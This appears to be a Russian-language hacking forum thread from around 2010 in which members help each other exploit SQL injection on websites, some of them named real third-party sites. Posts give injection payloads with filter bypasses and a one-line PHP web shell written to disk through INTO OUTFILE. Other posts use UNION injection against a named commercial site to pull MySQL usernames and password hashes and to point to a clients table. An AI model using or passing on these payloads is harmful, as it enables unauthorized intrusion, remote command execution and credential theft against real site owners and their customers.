Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    прощу помочь с этим скулем:
    http://localhost//?script=%2527
    вывод:
    и пробовал
    http://localhost//?script=%2527)+order+by+1+--+
    тоже результат такой же ((
    Как поступит в таком случае? Думал найду в других страничках но скул единственный
     
  2. Alf0x0ns

    Alf0x0ns Member

    Joined:
    12 Jan 2010
    Messages:
    14
    Likes Received:
    5
    Reputations:
    1
    так тебе ничего никто не поможет.. нужно ссылку на сайт со скулей.
     
  3. [NiGHT]DarkAngel

    [NiGHT]DarkAngel Elder - Старейшина

    Joined:
    29 Mar 2005
    Messages:
    131
    Likes Received:
    40
    Reputations:
    16
    http://localhost/?script=%2527)/* - так запрос должен выполниться без ошибок.
    http://localhost/?script=%2527) union select 1,2,3,user()/* - вот так будет sql-injection

    Это к примеру,т.к точного уязвимого скрипта нет.
     
  4. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    вроде ?script=%2527)/* норм но как добалю union select та же ошибка хз как обойти
     
  5. [NiGHT]DarkAngel

    [NiGHT]DarkAngel Elder - Старейшина

    Joined:
    29 Mar 2005
    Messages:
    131
    Likes Received:
    40
    Reputations:
    16
    Скидывай лог ошибки и если есть возможность изменить скрипт выводи sql запрос в браузер,так проще будет разобраться в чем причина.
     
  6. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    тоесть как выводит то сам запрос в браузер
     
  7. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    отправил в пм линк
     
  8. erolom

    erolom New Member

    Joined:
    14 Mar 2009
    Messages:
    0
    Likes Received:
    4
    Reputations:
    1
    спасибо M.W.N.N. и Rullery =)

    ну вот с привелегий FILE разобрался , ребята не можете теперь помочь как залить шелл если имееться данная привелегия и слышал что вначале лучше залить какой то "плохой" шелл а далее через него уже нормальный.Кто что посоветует по данному сабжу?
     
  9. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    union+select+'<? system($_GET['cmd']); ?>'+into+outfile+'/[path]/shell.php'
    Дальше site.com/shell.php?cmd=[command]
     
  10. svesve

    svesve Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    574
    Likes Received:
    86
    Reputations:
    11
    http://www.wearhouse.ru/show_img.php?img=http://img.yandex.net/i/www/logo.png

    можно инклудить любую картинку, есть возможность заинклудить не картинку?
     
  11. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    Причём тут инклуд? Просто адрес картинки подставляется в html тег или что-то типо того,что с php вообще никак не связано.
     
  12. svesve

    svesve Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    574
    Likes Received:
    86
    Reputations:
    11
    ясно, я видел что подставляется адрес картинки,просто решил уточнить.спс.

    ну хотя бы скули там есть )
     
  13. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    уже отправил в личико.
    Что получается я зря палил линк ((
     
  14. erolom

    erolom New Member

    Joined:
    14 Mar 2009
    Messages:
    0
    Likes Received:
    4
    Reputations:
    1
    что-то я не понял .. можно поподробнее?
     
  15. v1d0qz

    v1d0qz Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    67
    Likes Received:
    90
    Reputations:
    52
    Почему же?))
    Сайт конечно не кислый с таким количеством тиц и таким возрастом домена :)

    По теме. Щас уезжаю, потому доковырять не успею. Пока успел вывести только правильный запрос.
    ?script=%2527/**/and/**/1=1#
    ну или так если с выводом..
    ?script=%2527/**/and/**/1=%25271
    Потом, дубли организовать пока не удалось, выбивает 'Error Column 'table_name' in field list is ambiguous in', возможно из за того что до этого стоит ещё 2 или 3 join, а возможно и фикс, что за ошибка разберусь когда прийду, потому как раньше у меня такой ещё небыло. Далее.., запятая косит запрос, потому потому это ещё усложняет дело.
    зы. Так как это LIKE, то обрывать нужно через #, а пробелы как вы наверное заметили я заменил на /**/
    зы2. Через post всё аналогично.
     
    #11155 v1d0qz, 21 Jan 2010
    Last edited: 22 Jan 2010
  16. erolom

    erolom New Member

    Joined:
    14 Mar 2009
    Messages:
    0
    Likes Received:
    4
    Reputations:
    1
    спасибо , но уже перепробывал кучу вариантов ,ничего не получается,возможно что то не так делаю ...
    кодировку делаю...
    вот например сайтик с прив file
    [+]Printable field: 3,4,5
    [+]Vuln URL: http://www.sfinc.ca/details.php?product=-3403+UNION+SELECT+1,2,3,4,5,6,7,8,9--
    [+]MySQL Info: signature@localhost:4.1.22:signature:binjportbld-freebsd4.10
     
  17. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    а тут и не получиться у тебя, ковычки фильтруются, но зато читалка файлов есть.
     
  18. erolom

    erolom New Member

    Joined:
    14 Mar 2009
    Messages:
    0
    Likes Received:
    4
    Reputations:
    1
    спасибо походу нашёл то что надо
    https://forum.antichat.ru/threadnav34338-1-10.html

    пля жаль что только читалка файлов =/
     
    1 person likes this.
  19. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    http://www.sfinc.ca/details.php?product=-3403+UNION+SELECT+1,2,file_priv,4,5,6,7,8,9+from+mysql.user--

    а я думал што файл прив ето только привелегия пользователя рут...

    вот пасс
    http://www.sfinc.ca/details.php?product=-3403+UNION+SELECT+1,2,group_concat(0x3a,user,password),4,5,6,7,8,9+from+mysql.user--

    signature2ab907306f36b10c,signature

    а также есть табличка clients:)
     
    #11159 547, 22 Jan 2010
    Last edited: 22 Jan 2010
  20. wolmer

    wolmer Member

    Joined:
    12 May 2009
    Messages:
    438
    Likes Received:
    97
    Reputations:
    9
    sportonline.com.ua

    Что за движок новостей?
    Пример показывания новости: sportonline.com.ua/index.php?cont=long&id=8320

    (не самописный! если ввести в google -> cont=long&id= , то станет ясно что точно не самописный)
     
Thread Status:
Not open for further replies.